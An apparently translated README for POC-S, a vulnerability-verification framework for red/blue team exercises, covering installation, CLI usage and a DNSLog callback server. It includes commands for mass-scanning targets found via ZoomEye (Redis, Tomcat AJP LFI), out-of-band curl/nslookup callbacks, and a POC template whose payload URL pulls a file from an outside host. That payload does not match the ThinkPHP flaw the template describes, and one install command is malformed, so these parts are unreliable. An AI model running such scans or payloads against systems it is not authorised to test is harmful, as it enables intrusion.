
Versione potenziata di POC-T, POC-S, utilizzata per la rapida verifica delle vulnerabilità delle applicazioni Web negli esercizi di cyber defense (red-blue team). Potenzia le funzionalità e classifica gli script, include dnslog integrato, e la piattaforna integra POC ad alta disponibilità da macchine virtuali vulhub e altri progetti open-source.
La documentazione wiki di POC-T si trova nella directory doc
Prefazione: attualmente
Usare POC-S per attaccare un bersaglio senza previo consenso di entrambe le parti è illegale. POC-S è destinato esclusivamente a scopi di test di sicurezza.
TODO
Poiché le interfacce di terze parti richiedono autenticazione, puoi utilizzare il parametro --init per inizializzare la tua configurazione delle interfacce, es: --init zoomeye
pip install pocs
Installazione dal sorgente:
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install
Se con pip install pocs si verifica l'errore 'Some files missing', è necessario andare nella directory di installazione di pocs (python2.7\Lib\site-packages\pocs) e rinominare tookit.conf. Se si verifica l'errore
WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments., è un problema di dipendenze dei pacchetti. Controlla e aggiorna le versioni di alcuni pacchetti: setuptools==39.0.1 cachetools==3.1.1 google-api-python-client==1.7.11
pocs -s test/test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本
pocs -s test2 -iS 127.0.0.1 # 加载script/test2.py脚本
pocs -b test -iS 127.0.0.1 # 批量加载/script/test目录下的所有脚本
pocs -b test -s test2.py -iS 127.0.0.1 #加载script/test/test2.py脚本
pocs -s myself_script.py -iS 127.0.0.1 # 加载自定义的脚本和脚本目录
pocs -b mydir -iS 127.0.0.1
pocs --init zoomeye //初始化zoomeye的配置信息
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"
Utilizzo di ZoomEye per cercare in batch la vulnerabilità CNVD-2020-10487 tomcat ajp lfi
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

Se sei ancora preoccupato per l'instabilità di ceye e non hai tempo/energia per configurare una piattaforma DNSLog (che richiede due domini, un IP pubblico e la possibilità di modificare i server DNS del dominio), allora vale la pena provare la piattaforma dnslog semplice offerta da POC-S. Richiede solo un dominio e un IP pubblico per essere configurata e fornisce API per la verifica (senza interfaccia).
Supponendo che dnslog.xxx.cn sia il tuo dominio pubblico e x.x.x.x l'IP pubblico, assicurati che dnslog.xxx.cn risolva correttamente a x.x.x.x, altrimenti non sarà possibile accedere all'API. Esegui il comando sul server pubblico (x.x.x.x):
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88(se non installato con pip, puoi eseguire direttamente lo script pocs.dnslog.py)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x
Comando dns log, supporta solo il comando nslookup: nslookup 1234.dnslog.xxx.cn x.x.x.x
Se vuoi usare il comando ping 1234.dnslog.xxx.cn, puoi anche configurare server DNS personalizzati per il dominio xxx.cn (vedi la configurazione di DNSLog).
web log command: curl http://dnslog.xxx.cn:88/weblog/poc123
Indirizzo API: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn
Parametri:
- token obbligatorio, api_key inserita durante la configurazione del dnslog
- type obbligatorio, valori possibili: dns/web
- filter opzionale, filtra i record corrispondenti esattamente
pocs offre una categorizzazione dei plugin più flessibile. Attualmente, i POC raccolti si dividono in quattro categorie: Fuzz POC, OWASP POC, Vuln POC, Tool POC. Per quanto riguarda i POC, cercheremo di raccogliere quelli già esistenti su GitHub, ma non saranno troppi; sarà comunque necessario che ciascuno raccolga e organizzi i propri. f
La scrittura dei POC sarà il più possibile standardizzata, seguendo lo stile di POC-T. Esempio:
#!/usr/bin/env python
#coding:utf-8
"""
ThinkPHP5 <=5.0.22/<=5.1.29 远程代码执行漏洞
Desc
2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。
由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,
受影响的版本包括5.0.23和5.1.31之前的所有版本,推荐尽快更新到最新版本。
Version
ThinkPHP5.0 版本 <= 5.0.22 ThinkPHP5.1 版本 <= 5.1.29
Usage:
1. python POC-S.py -s
2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
Referer
https://www.seebug.org/vuldb/ssvid-9771
"""
import requests
def poc(url):
pass
Provengono principalmente dai plugin di vulhub e dai plugin POC inclusi in POC-T, aggiungendo solo POC ad alta affidabilità. Ogni POC elencato di seguito è stato verificato personalmente in un ambiente configurato ad hoc. Se ci sono POC errati, per favore apri una issue per contattarmi.
Fonte: boy-hack/POC-T
Fonte: script di rilevamento di hunter
Alcuni POC di strumenti comuni, forniscono funzionalità come motori di ricerca, ricerca di informazioni, ecc.
Altri POC open source come il progetto https://github.com/boy-hack/airbug raccolgono alcuni POC utilizzabili direttamente, ma hanno una libreria HackReqeust che è per Python 3, è necessario modificarla per Python 2. Puoi installare direttamente la mia libreria modificata per Python 2: https://github.com/jiangsir404/hack-requests